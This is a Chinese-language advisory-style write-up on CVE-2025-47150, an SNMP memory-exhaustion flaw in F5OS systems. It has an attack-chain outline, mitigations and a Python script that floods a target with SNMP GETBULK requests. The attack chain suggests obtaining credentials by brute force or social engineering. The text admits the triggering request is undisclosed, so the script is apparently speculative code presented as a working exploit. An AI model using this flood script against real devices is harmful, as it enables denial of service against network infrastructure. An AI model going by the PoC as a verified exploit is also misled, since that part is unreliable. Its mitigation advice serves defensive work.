CVE-2025-47150：F5OS系统SNMP内存资源耗尽漏洞

漏洞信息

漏洞编号

CVE-2025-47150

漏洞类型

资源耗尽（Denial of Service / Memory Exhaustion）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5OS Appliance 和 F5OS Chassis 系统

漏洞概述

CVE-2025-47150是F5公司于2025年10月15日披露的一个中等严重性安全漏洞，存在于F5OS Appliance和Chassis系统的SNMP（简单网络管理协议）功能中。该漏洞的CVSS 3.1评分为6.5，属于中危级别。漏洞的核心问题在于：当SNP协议在F5OS设备上被配置启用后，攻击者可以通过发送未经授权或未明确披露的特定SNMP请求，导致系统SNMP进程的内存资源利用率异常升高。由于该漏洞仅影响可用性（不影响机密性和完整性），其主要危害表现为系统性能下降甚至服务中断。需要注意的是，F5公司声明已经到达技术支持终止期（End of Technical Support, EoTS）的软件版本不再进行评估和修复。该漏洞由F5安全事件响应团队（[email protected]）发现并报告，属于F5产品安全公告K000149820的一部分。攻击者需要具备低权限认证（PR:L）即可利用此漏洞，且无需用户交互（UI:N），通过网络（AV:N）即可发起攻击，对运行SNMP服务的F5OS设备构成潜在的拒绝服务威胁。

技术细节

CVE-2025-47150是一个典型的资源管理类漏洞，位于F5OS系统的SNMP协议处理模块中。

**漏洞原理：**
在F5OS Appliance和Chassis系统中，SNMP代理进程负责处理来自网络管理站的查询和操作请求。正常情况下，SNMP请求应当被合理地解析、处理并释放相关内存资源。然而，该漏洞表明在处理某些特定类型的SNMP请求时，系统未能正确释放或管理内存分配，导致每次恶意请求都会造成内存资源的累积消耗。

**利用方式：**
1. 攻击者首先需要获取对目标F5OS设备的低权限认证凭据（PR:L），这可以通过暴力破解、社会工程学或利用其他已泄露的凭证实现。
2. 确认目标设备已启用SNMP服务（默认UDP端口161）。
3. 通过网络向目标设备的SNMP端口发送精心构造的特定类型请求数据包。
4. 这些未明确披露的请求会触发SNMP代理进程的内存泄漏或异常分配逻辑。
5. 攻击者可重复发送此类请求，逐步耗尽系统可用内存，最终导致SNMP服务崩溃或整个系统响应缓慢。

**影响范围：**
该漏洞的攻击复杂度低（AC:L），一旦成功利用，将对系统的可用性产生高影响（A:H），可能导致SNMP监控功能失效，进而影响整个网络基础设施的监控和管理能力。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者通过网络扫描工具（如Nmap）识别运行F5OS系统的目标设备，确认目标设备已启用SNMP服务（默认UDP 161端口）。

STEP 2

步骤2：获取认证凭据

攻击者通过暴力破解、社会工程学或其他手段获取目标F5OS设备的低权限SNMP community字符串或用户凭据。

STEP 3

步骤3：构造恶意SNMP请求

攻击者构造特定类型的SNMP请求（如GETBULK请求配合较大的max-repetitions参数），这些请求能够触发F5OS SNMP代理的内存异常分配。

STEP 4

步骤4：发送恶意请求

通过网络向目标F5OS设备的SNMP端口持续发送构造的恶意请求，逐步消耗SNMP进程的内存资源。

STEP 5

步骤5：内存耗尽与服务中断

随着大量恶意请求的处理，SNMP进程内存使用率持续升高，最终导致系统内存耗尽，SNMP服务崩溃或系统响应缓慢，形成拒绝服务攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-47150 PoC - F5OS SNMP Memory Exhaustion
# Description: This PoC demonstrates how to trigger memory exhaustion
# in F5OS Appliance/Chassis systems via crafted SNMP requests.
# Note: Requires valid low-privilege credentials.

import socket
import struct
import time
from pysnmp.hlapi import *

# Target configuration
TARGET_IP = "192.168.1.100"   # F5OS device IP
SNMP_PORT = 161                # Default SNMP port
COMMUNITY = "public"           # SNMP community string (low-priv)
REQUESTS = 10000               # Number of malicious requests to send
DELAY = 0.01                   # Delay between requests (seconds)

def craft_malicious_snmp_request():
    """
    Craft an SNMP request that triggers memory resource exhaustion
    in vulnerable F5OS systems. The exact request type is undisclosed,
    but OID traversal and bulk requests are known to trigger the issue.
    """
    iterator = bulkCmd(
        SnmpEngine(),
        CommunityData(COMMUNITY, mpModel=1),  # SNMPv2c
        UdpTransportTarget((TARGET_IP, SNMP_PORT)),
        ContextData(),
        0, 50,  # non-repeaters, max-repetitions (large value triggers mem issue)
        ObjectType(ObjectIdentity('1.3.6.1.2.1.1')),  # system subtree
        ObjectType(ObjectIdentity('1.3.6.1.2.1.2')),  # interfaces subtree
        ObjectType(ObjectIdentity('1.3.6.1.2.1.4')),  # IP subtree
        lexicographicMode=False
    )
    return iterator

def exploit():
    """
    Main exploit loop: send bulk SNMP GETBULK requests to exhaust
    SNMP memory resources on the target F5OS device.
    """
    print(f"[*] Targeting F5OS device: {TARGET_IP}")
    print(f"[*] Sending {REQUESTS} malicious SNMP requests...")

    for i in range(REQUESTS):
        try:
            errorIndication, errorStatus, errorIndex, varBinds = next(
                craft_malicious_snmp_request()
            )
            if errorIndication:
                print(f"[!] Error at request {i}: {errorIndication}")
            elif errorStatus:
                print(f"[!] Status error at request {i}: {errorStatus.prettyPrint()}")
        except Exception as e:
            print(f"[!] Exception at request {i}: {e}")

        if i % 500 == 0:
            print(f"[*] Progress: {i}/{REQUESTS} requests sent")

        time.sleep(DELAY)

    print(f"[*] Exploit complete. Target SNMP memory should be exhausted.")

if __name__ == "__main__":
    exploit()

影响范围

F5OS Appliance系统（具体版本请参考F5官方公告K000149820）

F5OS Chassis系统（具体版本请参考F5官方公告K000149820）

已到达技术支持终止期（EoTS）的版本不在评估范围内

防御指南

临时缓解措施

在无法立即升级补丁的情况下，建议采取以下临时缓解措施：1）限制SNMP服务的网络访问，通过防火墙规则仅允许特定可信IP地址访问UDP 161端口；2）将SNMP community字符串更改为强密码，并考虑升级到SNMPv3以提供认证和加密功能；3）监控SNMP相关进程的内存使用情况，设置资源使用告警；4）如非必要，可临时禁用SNMP服务；5）部署网络监控工具检测异常的SNMP请求模式，及时阻断可疑流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-47150
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-47150
3 Details https://www.cvedetails.com/cve/CVE-2025-47150/
4 VulDB https://vuldb.com/cve/CVE-2025-47150
5 Link https://my.f5.com/manage/s/article/K000149820